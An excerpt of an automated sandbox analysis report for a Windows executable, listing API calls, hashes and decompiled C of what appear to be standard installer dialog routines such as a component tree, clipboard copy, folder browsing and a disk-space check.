0x0040539f
0x004053a0
0x004053a8
0x004053b3
0x004053b9
0x004053b9
0x00000000
0x00405323
0x004052ac
0x00405259
0x00405289
0x00405291
0x0040529c
0x0040529c
0x004052a3
0x00000000
0x004052a3
0x0040525d
0x00405267
0x00000000
0x0040522e
0x00405234
0x0040526c
0x00000000
0x00405275
0x0040523d
0x00405242
0x00405245
0x00000000
0x00405245
0x0040522c
0x00405063
0x00405067
0x00405070
0x00405077
0x0040507a
0x0040507d
0x00405080
0x00405081
0x00405082
0x0040509b
0x0040509e
0x004050a8
0x004050b7
0x004050bf
0x004050c7
0x004050cc
0x004050cf
0x004050db
0x004050e4
0x004050ed
0x00405110
0x00405116
0x00405127
0x0040512c
0x0040513a
0x00405148
0x00405148
0x0040514d
0x0040515b
0x0040515b
0x00405160
0x00405163
0x00405168
0x00405174
0x0040517d
0x0040518a
0x00405199
0x0040518c
0x00405191
0x00405191
0x004051a5
0x004051a5
0x004051b9
0x004051c2
0x004051cb
0x004051db
0x004051e7
0x004051e7
0x00000000

APIs

GetDlgItem.USER32 ref: 004050A1
GetDlgItem.USER32 ref: 004050B0
GetClientRect.USER32 ref: 004050ED
GetSystemMetrics.USER32 ref: 004050F5
SendMessageA.USER32 ref: 00405116
SendMessageA.USER32 ref: 00405127
SendMessageA.USER32 ref: 0040513A
SendMessageA.USER32 ref: 00405148
SendMessageA.USER32 ref: 0040515B
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040517D
ShowWindow.USER32(?,00000008), ref: 00405191
GetDlgItem.USER32 ref: 004051B2
SendMessageA.USER32 ref: 004051C2
SendMessageA.USER32 ref: 004051DB
SendMessageA.USER32 ref: 004051E7
GetDlgItem.USER32 ref: 004050BF

Part of subcall function 00403F4D: SendMessageA.USER32 ref: 00403F5B

GetDlgItem.USER32 ref: 00405204
CreateThread.KERNEL32 ref: 00405212
CloseHandle.KERNEL32(00000000), ref: 00405219
ShowWindow.USER32(00000000), ref: 0040523D
ShowWindow.USER32(?,00000008), ref: 00405242
ShowWindow.USER32(00000008), ref: 00405289
SendMessageA.USER32 ref: 004052BB
CreatePopupMenu.USER32 ref: 004052CC
AppendMenuA.USER32 ref: 004052E1
GetWindowRect.USER32 ref: 004052F4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405318
SendMessageA.USER32 ref: 00405353
OpenClipboard.USER32(00000000), ref: 00405363
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405369
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405372
GlobalLock.KERNEL32 ref: 0040537C
SendMessageA.USER32 ref: 00405390
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004053A8
SetClipboardData.USER32 ref: 004053B3
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004053B9

Strings

{, xrefs: 004052A8

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
Instruction ID: b28aa7ce0402c6385ba5b6cd868a6258f1d07b471923b7bae974b2a68da01879
Opcode Fuzzy Hash: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
Instruction Fuzzy Hash: 34A14870904208FFDB219F60DD89AAE7F79FB08355F00417AFA05BA2A0C7795A41DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00404853, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00404853(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004047D3(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42047c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x420494;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42047c = _t315;
								 *0x420494 = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420494;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E004046F1(0x3ff, 0xfffffffb, E004047A6(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420494);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420494 = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420488 =  *0x420488 | 0xffffffff;
					_v24 = _t250;
					 *0x420490 = SetWindowLongA(_v8, 0xfffffffc, E00404E54);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42047c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42047c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B88(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403F18(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403F18(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420494 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420494 + _t318 * 4) = _t274;
									_t288 =  *( *0x420494 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F4D(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F4D(_v12);
								L89:
								return E00403F7F(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404871
0x00404877
0x00404879
0x0040487f
0x00404885
0x00404892
0x0040489b
0x0040489e
0x004048a1
0x00404ac9
0x00404ad0
0x00404ae4
0x00404ad2
0x00404ad4
0x00404ad7
0x00404ad8
0x00404adf
0x00404adf
0x00404af0
0x00404afe
0x00404b01
0x00404b17
0x00404b8f
0x00404b92
0x00404b94
0x00404b9e
0x00404bac
0x00404bac
0x00404bae
0x00404bb8
0x00404bbe
0x00404bdf
0x00404bc0
0x00404bcd
0x00404bcd
0x00404bbe
0x00404bb8
0x00000000
0x00404b92
0x00404b1c
0x00404b27
0x00404b2c
0x00404b33
0x00404b3a
0x00404b44
0x00404b44
0x00404b48
0x00404b4d
0x00404b52
0x00404b68
0x00404b54
0x00404b54
0x00404b5c
0x00404b63
0x00404b5e
0x00404b5e
0x00404b5e
0x00404b5c
0x00404b6c
0x00404b6e
0x00404b7c
0x00404b7d
0x00404b89
0x00404b8c
0x00404b8c
0x00404b4d
0x00000000
0x00404b3a
0x00404b1e
0x00404b25
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404be2
0x00404be2
0x00404be9
0x00404c5d
0x00404c64
0x00404c70
0x00404c70
0x00404c79
0x00404c7b
0x00404c82
0x00404c85
0x00404c85
0x00404c8b
0x00404c92
0x00404c95
0x00404c95
0x00404c9b
0x00404ca1
0x00404ca7
0x00404ca7
0x00404cb4
0x00404e01
0x00404e08
0x00404e25
0x00404e2b
0x00404e3d
0x00404e3d
0x00000000
0x00404cba
0x00404cbc
0x00404cc4
0x00404cc8
0x00404cc8
0x00404cd0
0x00404d11
0x00404d13
0x00404d23
0x00404d26
0x00404d2b
0x00404d32
0x00404d35
0x00404dd7
0x00404ddd
0x00404deb
0x00404dfc
0x00404dfc
0x00000000
0x00404deb
0x00404d3b
0x00404d3e
0x00404d44
0x00404d49
0x00404d4b
0x00404d4d
0x00404d53
0x00404d5a
0x00404d5f
0x00404d66
0x00404d69
0x00404d69
0x00404d70
0x00404d7c
0x00404d80
0x00404d82
0x00404d82
0x00404d72
0x00404d74
0x00404d74
0x00404da2
0x00404dae
0x00404dbd
0x00404dbd
0x00404dbf
0x00404dc2
0x00404dcb
0x00000000
0x00404cd2
0x00404cdd
0x00404ce0
0x00404ce5
0x00404ce7
0x00404ceb
0x00404cfb
0x00404d05
0x00404d07
0x00404d0a
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ced
0x00404ced
0x00404cf3
0x00404cf5
0x00404cf5
0x00404cf6
0x00404cf7
0x00000000
0x00404ced
0x00404cd0
0x00404cb4
0x00404bf1
0x00000000
0x00404c07
0x00404c11
0x00404c16
0x00000000
0x00000000
0x00404c28
0x00404c2d
0x00404c39
0x00404c39
0x00404c3b
0x00404c4a
0x00404c4c
0x00404c53
0x00404c56
0x00000000
0x00404c56
0x00404bf1
0x004048a7
0x004048ac
0x004048b6
0x004048b7
0x004048c0
0x004048cb
0x004048d6
0x004048dc
0x004048ea
0x004048ff
0x00404904
0x0040490f
0x00404918
0x0040492d
0x0040493e
0x0040494b
0x0040494b
0x00404950
0x00404956
0x00404958
0x0040495b
0x00404960
0x00404965
0x00404967
0x00404967
0x00404987
0x00404987
0x00404989
0x0040498a
0x0040498f
0x00404992
0x00404995
0x00404999
0x0040499e
0x004049a3
0x004049a7
0x004049ac
0x004049b1
0x004049b3
0x004049bb
0x00404a85
0x00404a98
0x00000000
0x004049c1
0x004049c4
0x004049c7
0x004049ca
0x004049ca
0x004049d0
0x004049d6
0x004049d9
0x004049df
0x004049e0
0x004049e5
0x004049ee
0x004049f5
0x004049f8
0x004049fb
0x004049fe
0x00404a3a
0x00404a63
0x00404a3c
0x00404a49
0x00404a49
0x00404a00
0x00404a03
0x00404a12
0x00404a1c
0x00404a24
0x00404a2b
0x00404a33
0x00404a33
0x004049fe
0x00404a69
0x00404a6a
0x00404a76
0x00404a76
0x00404a83
0x00404a9e
0x00404aa2
0x00404abf
0x00404ac4
0x00404ac7
0x00000000
0x00404aa4
0x00404aa9
0x00404ab2
0x00404e3f
0x00404e51
0x00404e51
0x00404aa2
0x00000000
0x00404a83
0x004049bb

APIs

GetDlgItem.USER32 ref: 0040486A
GetDlgItem.USER32 ref: 00404877
GlobalAlloc.KERNEL32(00000040,?), ref: 004048C3
LoadBitmapA.USER32 ref: 004048D6
SetWindowLongA.USER32 ref: 004048F0
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404904
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404918
SendMessageA.USER32 ref: 0040492D
SendMessageA.USER32 ref: 00404939
SendMessageA.USER32 ref: 0040494B
DeleteObject.GDI32(?), ref: 00404950
SendMessageA.USER32 ref: 0040497B
SendMessageA.USER32 ref: 00404987
SendMessageA.USER32 ref: 00404A1C
SendMessageA.USER32 ref: 00404A47
SendMessageA.USER32 ref: 00404A5B
GetWindowLongA.USER32 ref: 00404A8A
SetWindowLongA.USER32 ref: 00404A98
ShowWindow.USER32(?,00000005), ref: 00404AA9
SendMessageA.USER32 ref: 00404BAC
SendMessageA.USER32 ref: 00404C11
SendMessageA.USER32 ref: 00404C26
SendMessageA.USER32 ref: 00404C4A
SendMessageA.USER32 ref: 00404C70
ImageList_Destroy.COMCTL32(?), ref: 00404C85
GlobalFree.KERNEL32 ref: 00404C95
SendMessageA.USER32 ref: 00404D05
SendMessageA.USER32 ref: 00404DAE
SendMessageA.USER32 ref: 00404DBD
InvalidateRect.USER32(?,00000000,00000001), ref: 00404DDD
ShowWindow.USER32(?,00000000), ref: 00404E2B
GetDlgItem.USER32 ref: 00404E36
ShowWindow.USER32(00000000), ref: 00404E3D

Strings

N, xrefs: 00404AE7
, xrefs: 00404E15
M, xrefs: 00404A03

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
Instruction ID: 91af9d563adbb526dddc39620d8b288a2aea1bcbb5731436b9e02a5cfbe7d22d
Opcode Fuzzy Hash: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
Instruction Fuzzy Hash: AB029FB0E00209AFDB21DF54DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404356, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404356(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc70;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040540B(0x3fb, _t162);
					E00405DC8(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040540B(0x3fb, _t162);
							if(E0040573A(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405B66(0x41f468, _t162);
							_t145 = 0;
							_t86 = E00405E88(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405B66(0x41f468, _t162);
								_t88 = E004056ED(0x41f468);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f468,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f468) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f468,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004056A0(0x41f468) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f468) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004047A6(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E004046F1(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f458);
									} else {
										E004046F1(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403F3A(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x42048c == _t145) {
									E004042EB();
								}
								 *0x42048c = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x4204a0;
							_v56 = E0040468B;
							_v52 = _t162;
							_v64 = E00405B88(0x3fb, 0x4204a0, _t162, 0x41f870, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405659(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E00405B88(0x3fb, 0x4204a0, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x4204a0) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x42048c =  &(( *0x42048c)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004056C6(_t162) != 0 && E004056ED(_t162) == 0) {
						E00405659(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403F18(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403F18(_t159);
					E00403F4D(_v12);
					_t138 = E00405E88(7);
					if(_t138 == 0) {
						L53:
						return E00403F7F(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}

0x0040435c
0x00404363
0x0040436f
0x0040437d
0x00404385
0x00404389
0x0040438f
0x0040438f
0x0040439b
0x0040440f
0x00404416
0x004044eb
0x004044f2
0x00404501
0x00404501
0x00404505
0x0040450b
0x00404518
0x0040451a
0x0040451a
0x00404528
0x0040452d
0x00404530
0x00404537
0x0040453a
0x00404571
0x00404573
0x00404579
0x00404580
0x00404582
0x00404582
0x0040459e
0x004045da
0x00000000
0x004045a0
0x004045a3
0x004045b7
0x004045b9
0x00000000
0x004045b9
0x0040453c
0x00404540
0x0040456f
0x0040456f
0x00000000
0x00000000
0x00000000
0x00000000
0x00404542
0x00404542
0x0040454f
0x00404554
0x00000000
0x00000000
0x00404558
0x0040455a
0x0040455a
0x00404565
0x00404568
0x0040456d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040456d
0x004045c8
0x004045cf
0x004045d6
0x004045dd
0x004045dd
0x004045e2
0x004045e4
0x004045ec
0x004045f2
0x004045f2
0x00404602
0x0040460c
0x00404614
0x0040462a
0x00404616
0x0040461a
0x0040461a
0x00404614
0x0040462f
0x00404634
0x00404639
0x00404642
0x00404642
0x0040464b
0x0040464d
0x0040464d
0x00404659
0x00404661
0x0040466b
0x0040466b
0x00404670
0x00000000
0x00404670
0x0040453a
0x004044f4
0x004044fb
0x00000000
0x00000000
0x00000000
0x004044fb
0x0040441c
0x00404422
0x0040443c
0x00404441
0x0040444b
0x00404452
0x00404461
0x00404464
0x00404467
0x0040446e
0x00404476
0x00404479
0x0040447d
0x00404484
0x0040448c
0x004044e4
0x0040448e
0x0040448f
0x00404496
0x004044a0
0x004044a8
0x004044b5
0x004044c9
0x004044cd
0x004044cd
0x004044c9
0x004044d2
0x004044dd
0x004044dd
0x0040448c
0x00000000
0x00404441
0x0040442f
0x00000000
0x00000000
0x00404435
0x00000000
0x0040439d
0x0040439d
0x004043a9
0x004043b3
0x004043c0
0x004043c0
0x004043c6
0x004043cf
0x004043d8
0x004043db
0x004043de
0x004043e6
0x004043e9
0x004043ec
0x004043f4
0x004043fb
0x00404402
0x00404676
0x00404688
0x00404688
0x0040440d
0x00000000
0x0040440d

APIs

GetDlgItem.USER32 ref: 004043A2
SetWindowTextA.USER32(?,?), ref: 004043CF
SHBrowseForFolderA.SHELL32(?,0041F870,?), ref: 00404484
CoTaskMemFree.OLE32(00000000), ref: 0040448F
lstrcmpiA.KERNEL32(Call,004204A0,00000000,?,?), ref: 004044C1
lstrcatA.KERNEL32(?,Call), ref: 004044CD
SetDlgItemTextA.USER32 ref: 004044DD

Part of subcall function 0040540B: GetDlgItemTextA.USER32 ref: 0040541E

Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\2435.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\2435.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
